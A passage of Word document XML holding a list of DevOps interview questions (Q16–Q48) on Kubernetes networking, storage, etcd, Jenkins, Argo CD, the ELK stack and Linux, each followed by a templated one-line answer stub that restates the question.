        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Services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there are 10-20 worker nodes, which node IP will you choose?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. If the Load Balancer is down, how will you troubleshoot the application using NodePort?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Services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the Load Balancer is down, how will you troubleshoot the application using NodePort?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How do you expose a service outside the Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes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expose a service outside the Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Which Ingress Controller are you using?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Ingress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Ingress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Ingress Controller are you using?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. How do you install or setup the NGINX Ingress Controller in GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Ingress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Ingress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install or setup the NGINX Ingress Controller in GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. You already have a GKE cluster. How will you configure an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Ingress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Ingress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You already have a GKE cluster. How will you configure an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Why do we use an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Ingress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Ingress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Why do we use an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. If NGINX Ingress is deprecated, what will you use in the future?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Ingress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Ingress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NGINX Ingress is deprecated, what will you use in the future?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How will you expose applications after moving away from NGINX Ingress?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Ingress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Ingress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will you expose applications after moving away from NGINX Ingress?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How do you expose an application using a Kubernetes Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Services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expose an application using a Kubernetes Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. Why do we use Namespaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Namespaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Namespaces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Why do we use Namespaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. What is the role of etcd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Control Plane</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Control Plane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role of etcd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. Can you take a backup of etcd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Control Plane</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Control Plane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Can you take a backup of etcd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. How does the kube-apiserver communicate with etcd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Control Plane</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Control Plane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the kube-apiserver communicate with etcd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. What is a DaemonSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Workloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Workloads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a DaemonSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. How does the Horizontal Pod Autoscaler (HPA) work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Autoscaling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the Horizontal Pod Autoscaler (HPA) work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. Does HPA scale based on resource requests or resource limits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Autoscaling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Does HPA scale based on resource requests or resource limits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. Explain StorageClass, Persistent Volume (PV), and Persistent Volume Claim (PVC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Storage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StorageClass, Persistent Volume (PV), and Persistent Volume Claim (PVC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. What is the difference between static provisioning and dynamic provisioning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Storage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static provisioning and dynamic provisioning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. How do you take a backup of your Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Backup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take a backup of your Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. What is the difference between volume and volumeMount?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Storage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volume and volumeMount?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. What kind of Jenkins pipelines have you created?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD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kind of Jenkins pipelines have you created?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. How do you take a backup of Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Jenkins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take a backup of Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. Have you used Argo CD or Harness?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GitOps/Argo CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GitOps/Argo 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used Argo CD or Harness?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. How does Argo CD work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GitOps/Argo CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GitOps/Argo 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Argo CD work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. If someone changes a Kubernetes resource using kubectl but does not update Git, what happens?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GitOps/Argo CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GitOps/Argo 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someone changes a Kubernetes resource using kubectl but does not update Git, what happens?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. Explain the ELK Stack along with OpenTelemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/ELK/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring/ELK/OpenTelemetry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the ELK Stack along with OpenTelemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. What is the complete log flow from the application to Kibana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/ELK/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring/ELK/OpenTelemetry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complete log flow from the application to Kibana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. What is the role of the OpenTelemetry Collector?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the OpenTelemetry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role of the OpenTelemetry Collector?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. What is the role of the APM Server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Elastic/APM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Elastic/APM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role of the APM Server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. How do you delete old logs from Elasticsearch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Elasticsearch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delete old logs from Elasticsearch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. If ILM is not working and Elasticsearch storage is full, how will you clean up the logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Elasticsearch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ILM is not working and Elasticsearch storage is full, how will you clean up the logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. If Kibana is not working, how will you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kibana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Kibana is not working, how will you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. If a Linux server has very high load, how will you reduce it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
